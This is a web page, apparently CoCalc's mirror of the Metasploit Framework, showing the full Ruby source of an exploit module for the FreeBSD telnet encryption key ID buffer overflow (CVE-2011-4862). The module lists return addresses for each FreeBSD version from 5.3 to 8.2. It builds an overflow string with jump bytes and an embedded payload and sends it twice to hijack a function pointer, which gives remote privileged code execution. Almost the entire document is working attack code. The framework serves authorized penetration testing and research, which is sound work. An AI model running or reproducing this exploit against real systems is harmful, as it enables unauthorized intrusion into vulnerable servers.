Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/freebsd/telnet/telnet_encrypt_keyid.rb
19664 views
1
# -*- coding: binary -*-
2
3
##
4
# This module requires Metasploit: https://metasploit.com/download
5
# Current source: https://github.com/rapid7/metasploit-framework
6
##
7
8
class MetasploitModule < Msf::Exploit::Remote
9
Rank = GreatRanking
10
11
include Msf::Exploit::Remote::Telnet
12
include Msf::Exploit::BruteTargets
13
14
def initialize(info = {})
15
super(
16
update_info(
17
info,
18
'Name' => 'FreeBSD Telnet Service Encryption Key ID Buffer Overflow',
19
'Description' => %q{
20
This module exploits a buffer overflow in the encryption option handler of the
21
FreeBSD telnet service.
22
},
23
'Author' => [
24
'Jaime Penalba Estebanez <jpenalbae[at]gmail.com>',
25
'Brandon Perry <bperry.volatile[at]gmail.com>',
26
'Dan Rosenberg',
27
'hdm'
28
],
29
'License' => MSF_LICENSE,
30
'References' => [
31
['CVE', '2011-4862'],
32
['OSVDB', '78020'],
33
['BID', '51182'],
34
['EDB', '18280']
35
],
36
'Privileged' => true,
37
'Platform' => 'bsd',
38
'Arch' => [ ARCH_X86 ],
39
'Payload' => {
40
'Space' => 128,
41
'BadChars' => "\x00"
42
},
43
44
'Targets' => [
45
[ 'Automatic', {} ],
46
[ 'FreeBSD 8.2', { 'Ret' => 0x0804a8a9 } ], # call edx
47
[ 'FreeBSD 8.1', { 'Ret' => 0x0804a889 } ], # call edx
48
[ 'FreeBSD 8.0', { 'Ret' => 0x0804a869 } ], # call edx
49
[ 'FreeBSD 7.3/7.4', { 'Ret' => 0x08057bd0 } ], # call edx
50
[ 'FreeBSD 7.0/7.1/7.2', { 'Ret' => 0x0804c4e0 } ], # call edx
51
[ 'FreeBSD 6.3/6.4', { 'Ret' => 0x0804a5b4 } ], # call edx
52
[ 'FreeBSD 6.0/6.1/6.2', { 'Ret' => 0x08052925 } ], # call edx
53
[ 'FreeBSD 5.5', { 'Ret' => 0x0804cf31 } ], # call edx
54
# [ 'FreeBSD 5.4', { 'Ret' => 0x08050006 } ] # Version 5.4 does not seem to be exploitable (the crypto() function is not called)
55
[ 'FreeBSD 5.3', { 'Ret' => 0x8059730 } ], # direct return
56
# Versions 5.2 and below do not support encyption
57
],
58
'DefaultTarget' => 0,
59
'DisclosureDate' => '2011-12-23',
60
'Notes' => {
61
'Stability' => [ CRASH_SERVICE_RESTARTS, ],
62
'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK ],
63
'Reliability' => [ REPEATABLE_SESSION, ]
64
}
65
)
66
)
67
end
68
69
def exploit_target(target)
70
connect
71
banner_sanitized = Rex::Text.to_hex_ascii(banner.to_s)
72
vprint_status(banner_sanitized)
73
74
enc_init = "\xff\xfa\x26\x00\x01\x01\x12\x13\x14\x15\x16\x17\x18\x19\xff\xf0"
75
enc_keyid = "\xff\xfa\x26\x07"
76
end_suboption = "\xff\xf0"
77
78
# Telnet protocol requires 0xff to be escaped with another
79
penc = payload.encoded.gsub("\xff", "\xff\xff")
80
81
key_id = Rex::Text.rand_text_alphanumeric(400)
82
key_id[0, 2] = "\xeb\x76"
83
key_id[72, 4] = [ target['Ret'] - 20 ].pack('V')
84
key_id[76, 4] = [ target['Ret'] ].pack('V')
85
86
# Some of these bytes can get mangled, jump over them
87
key_id[80, 112] = Rex::Text.rand_text_alphanumeric(112)
88
89
# Bounce to the real payload (avoid corruption)
90
key_id[120, 2] = "\xeb\x46"
91
92
# The actual payload
93
key_id[192, penc.length] = penc
94
95
# Create the Key ID command
96
sploit = enc_keyid + key_id + end_suboption
97
98
# Initiate encryption
99
sock.put(enc_init)
100
101
# Wait for a successful response
102
loop do
103
data = begin
104
sock.get_once(-1, 5)
105
rescue StandardError
106
nil
107
end
108
if !data
109
fail_with(Failure::Unknown, 'This system does not support encryption')
110
end
111
break if data.index("\xff\xfa\x26\x02\x01")
112
end
113
114
# The first request smashes the pointer
115
print_status('Sending first payload')
116
sock.put(sploit)
117
118
# Make sure the server replied to the first request
119
data = sock.get_once(-1, 5)
120
unless data
121
print_status('Server did not respond to first payload')
122
return
123
end
124
125
# Some delay between each request seems necessary in some cases
126
::IO.select(nil, nil, nil, 0.5)
127
128
# The second request results in the pointer being called
129
print_status('Sending second payload...')
130
sock.put(sploit)
131
132
handler
133
134
::IO.select(nil, nil, nil, 0.5)
135
disconnect
136
end
137
end
138
139